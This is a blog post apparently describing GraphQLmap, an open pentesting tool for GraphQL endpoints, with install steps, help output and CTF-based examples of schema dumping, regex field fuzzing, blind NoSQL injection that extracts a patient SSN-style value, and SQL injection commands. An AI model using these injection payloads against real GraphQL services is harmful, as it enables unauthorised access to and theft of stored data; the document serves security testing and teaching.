GraphQLmap : A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes

GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.

Install

$ git clone https://github.com/swisskyrepo/GraphQLmap
$ python graphqlmap.py
_
/ | | | / _ | | | | _ _ _ _ _ _ | |_ | | | | | _ _ _ _ _ _ | | | | ‘/ | '_ | '_ | | | | | | '_ \ / ` | ‘ \ | || | | | (| | |) | | | | || | || | | | | | (| | |) | _|| _,| ./|| ||_________|| || ||_,| ._/
| | | |
|| ||
Author:Swissky Version:1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [–method [METHOD]] [–headers [HEADERS]]
optional arguments:
-h, –help show this help message and exit
-u URL URL to query : example.com/graphql?query={}
-v [VERBOSITY] Enable verbosity
–method [METHOD] HTTP Method to use interact with /graphql endpoint
–headers [HEADERS] HTTP Headers sent to /graphql endpoint
–json Send requests using POST and JSON

Features And Examples

Examples are based on several CTF challenges from HIP2019.

Connect to a graphql endpoint

python3 graphqlmap.py -u https://yourhostname.com/graphql -v –method POST –headers ‘{“Authorization” : “Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o”}’

Dump a GraphQL schema

Use dump_new to dump the GraphQL schema, this function will automaticly populate the “autocomplete” with the found fields.

GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)
Query
doctor[]: email (String!),
doctors[Doctor]:
patients[Patient]:
patient[]: id (ID!),
allrendezvous[Rendezvous]:
rendezvous[]: id (ID!),
Doctor
id[ID]:
firstName[String]:
lastName[String]:
specialty[String]:
patients[None]:
rendezvous[None]:
email[String]:
password[String]:
[…]

Interact With A GraphQL Endpoint

Write a GraphQL request and execute it.

GraphQLmap > {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admin\”} }”){firstName lastName id}}
{
“data”: {
“doctors”: [
{
“firstName”: “Admin”,
“id”: “5d089c51dcab2d0032fdd08d”,
“lastName”: “Admin”
}
]
}
}

GraphQL Field Fuzzing

Use GRAPHQL_INCREMENT and GRAPHQL_CHARSET to fuzz a parameter.

GraphQLmap > {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”AdmiGRAPHQL_CHARSET\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi!\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi$\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi%\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi(\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi)\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi*\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi+\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi,\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi-\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi.\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi/\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi0\”} }”){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi1\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admi?\”} }”){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: “{ \”lastName\”: { \”$regex\”: \”Admin\”} }”){firstName lastName id}}

NoSQLi Injection

Use BLIND_PLACEHOLDER inside the query for the nosqli function.

GraphQLmap > nosqli
Query > {doctors(options: “{\”\”patients.ssn\”:1}”, search: “{ \”patients.ssn\”: { \”$regex\”: \”^BLIND_PLACEHOLDER\”}, \”lastName\”:\”Admin\” , \”firstName\”:\”Admin\” }”){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >

SQL Injection

GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli

Download
R K

Share
Published by
R K
Tags: GraphQLGraphQLmappentestscripting engine
4 years ago

Recent Posts

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

16 minutes ago

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

52 minutes ago

What Does chmod 777 Mean in Linux

If you are a Linux user, you have probably seen commands like chmod 777 while…

54 minutes ago

How to Undo and Redo in Vim or Vi

Vim and Vi are among the most powerful text editors in the Linux world. They…

56 minutes ago

How to Unzip and Extract Files in Linux

Working with compressed files is a common task for any Linux user. Whether you are…

60 minutes ago

Free Email Lookup Tools and Reverse Email Search Resources

In the digital era, an email address can reveal much more than just a contact…

1 hour ago